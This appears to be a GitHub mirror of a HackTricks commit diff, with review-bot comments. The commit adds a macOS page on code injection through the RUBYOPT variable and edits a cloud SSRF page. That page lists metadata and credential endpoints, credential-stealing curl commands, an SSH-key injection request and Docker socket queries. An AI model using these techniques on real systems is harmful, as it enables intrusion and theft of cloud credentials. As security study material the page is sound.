mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-4241: change request with no subject merged in GitBook
This commit is contained in:
parent
f0447c9b2e
commit
f00afc243f
4 changed files with 85 additions and 16 deletions
|
@ -179,6 +179,7 @@
|
||||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
|
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
|
||||||
|
* [macOS Ruby Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md)
|
||||||
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
|
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
|
||||||
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
|
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
|
||||||
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
|
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
|
||||||
|
|
|
@ -82,6 +82,14 @@ Check different options to make a Perl script execute arbitrary code in:
|
||||||
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
|
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### Ruby Injection
|
||||||
|
|
||||||
|
I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code:
|
||||||
|
|
||||||
|
{% content-ref url="macos-ruby-applications-injection.md" %}
|
||||||
|
[macos-ruby-applications-injection.md](macos-ruby-applications-injection.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Python Injection
|
### Python Injection
|
||||||
|
|
||||||
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\
|
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\
|
||||||
|
|
|
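Review bot: the new sentence under `### Ruby Injection` has a typo, `I't also possible` should read `It's also possible`. Otherwise the added block mirrors the Perl section right above it (one sentence plus a `{% content-ref %}` to `macos-ruby-applications-injection.md`), which is consistent with how the rest of this README is laid out.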
@ -0,0 +1,61 @@
|
||||||
|
# macOS Ruby Applications Injection
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## RUBYOPT
|
||||||
|
|
||||||
|
Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**.
|
||||||
|
|
||||||
|
Create the library **`inject.rb`** in **`/tmp`**:
|
||||||
|
|
||||||
|
{% code title="inject.rb" %}
|
||||||
|
```ruby
|
||||||
|
puts `whoami`
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Create anywahere a ruby script like:
|
||||||
|
|
||||||
|
{% code title="hello.rb" %}
|
||||||
|
```ruby
|
||||||
|
puts 'Hello, World!'
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Then make an arbitrary ruby script load it with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb
|
||||||
|
```
|
||||||
|
|
||||||
|
Fun fact, it works even with param **`--disable-rubyopt`**:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
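Review bot: the `--disable-rubyopt` example does not test what the sentence claims. In `RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt` the flag comes after the script name, so Ruby passes it to `hello.rb` as a script argument (`ARGV[0]`) and still processes `RUBYOPT` normally; the injected library loading in that run says nothing about whether the flag is bypassed. To actually exercise the flag it has to precede the script (`ruby --disable-rubyopt hello.rb`); please re-run it in that form and either keep the "fun fact" with the corrected command or drop it. Two smaller points in the same file: `Create anywahere a ruby script like:` should read `anywhere`, and the `RUBYOPT` paragraph could say explicitly that `-I/tmp -rinject` resolves to `/tmp/inject.rb`, which is why the library is created with that name.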
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
|
@ -133,7 +133,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
|
||||||
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
|
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### SSRF for AWS Lambda <a href="#6f97" id="6f97"></a>
|
### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
|
||||||
|
|
||||||
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
|
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
|
||||||
|
|
||||||
|
@ -149,7 +149,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat
|
||||||
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
|
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
|
||||||
|
|
||||||
We retrieve the `accountId` and `region` from the API.
|
We retrieve the `accountId` and `region` from the API.
|
||||||
|
|
||||||
|
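Review bot: after this rename both `### SSRF for AWS Lambda` (previous hunk) and `### SSRF URL for AWS Elastic Beanstalk` carry `href="#id-6f97" id="id-6f97"`, so the Elastic Beanstalk heading has a duplicate `id` and a link to it will resolve to the Lambda heading instead. The change only prefixed the value that was already duplicated; since these lines are being touched anyway, give the second heading its own id.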
@ -168,13 +168,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
|
||||||
|
|
||||||
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
||||||
|
|
||||||
## GCP <a href="#6440" id="6440"></a>
|
## GCP <a href="#id-6440" id="id-6440"></a>
|
||||||
|
|
||||||
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
||||||
|
|
||||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
|
||||||
|
|
||||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
|
||||||
|
|
||||||
* http://169.254.169.254
|
* http://169.254.169.254
|
||||||
* http://metadata.google.internal
|
* http://metadata.google.internal
|
||||||
|
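Review bot: same duplicate-id problem in this hunk: `## GCP` and `### SSRF URL for Google Cloud` both become `id-6440`, so the subsection anchor is unreachable. On the reworded header line, dropping `X-Google-Metadata-Request: True` and stating that `Metadata-Flavor: Google` is required makes the requirement unambiguous; if the alternative header was removed because it is no longer accepted, that is the right call, but the sentence still reads `access the metadata endpoint in with the following URLs`, where the stray `in` should go.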
@ -284,7 +284,7 @@ gcloud config unset auth/access_token_file
|
||||||
```
|
```
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
|
||||||
|
|
||||||
Extract the token
|
Extract the token
|
||||||
|
|
||||||
|
@ -315,7 +315,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
|
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
|
||||||
|
@ -335,7 +335,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
|
||||||
curl http://169.254.169.254/metadata/v1.json | jq
|
curl http://169.254.169.254/metadata/v1.json | jq
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
|
@ -477,7 +477,7 @@ At line:1 char:1
|
||||||
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
|
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
|
||||||
```
|
```
|
||||||
|
|
||||||
## IBM Cloud <a href="#2af0" id="2af0"></a>
|
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
|
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
|
||||||
|
@ -509,11 +509,11 @@ curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instanc
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
## Packetcloud <a href="#2af0" id="2af0"></a>
|
## Packetcloud <a href="#id-2af0" id="id-2af0"></a>
|
||||||
|
|
||||||
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
||||||
|
|
||||||
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
## OpenStack/RackSpace <a href="#id-2ffc" id="id-2ffc"></a>
|
||||||
|
|
||||||
(header required? unknown)
|
(header required? unknown)
|
||||||
|
|
||||||
|
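Review bot: `## Packetcloud` now gets `id-2af0`, the same id `## IBM Cloud` received in the previous hunk, so the Packetcloud anchor collides with the IBM one. This is the third pair of colliding ids in this file after the AWS (`id-6f97`) and GCP (`id-6440`) headings; a pass over all the `<a href="#id-…" id="id-…">` anchors in `cloud-ssrf.md` to make each value unique would close all of them in one go.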
@ -538,7 +538,7 @@ http://192.0.0.192/latest/meta-data/
|
||||||
http://192.0.0.192/latest/attributes/
|
http://192.0.0.192/latest/attributes/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Alibaba <a href="#51bd" id="51bd"></a>
|
## Alibaba <a href="#id-51bd" id="id-51bd"></a>
|
||||||
|
|
||||||
```
|
```
|
||||||
http://100.100.100.200/latest/meta-data/
|
http://100.100.100.200/latest/meta-data/
|
||||||
|
@ -564,19 +564,18 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||||
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||||
```
|
```
|
||||||
|
|
||||||
## Rancher <a href="#8cb7" id="8cb7"></a>
|
## Rancher <a href="#id-8cb7" id="id-8cb7"></a>
|
||||||
|
|
||||||
```
|
```
|
||||||
curl http://rancher-metadata/<version>/<path>
|
curl http://rancher-metadata/<version>/<path>
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|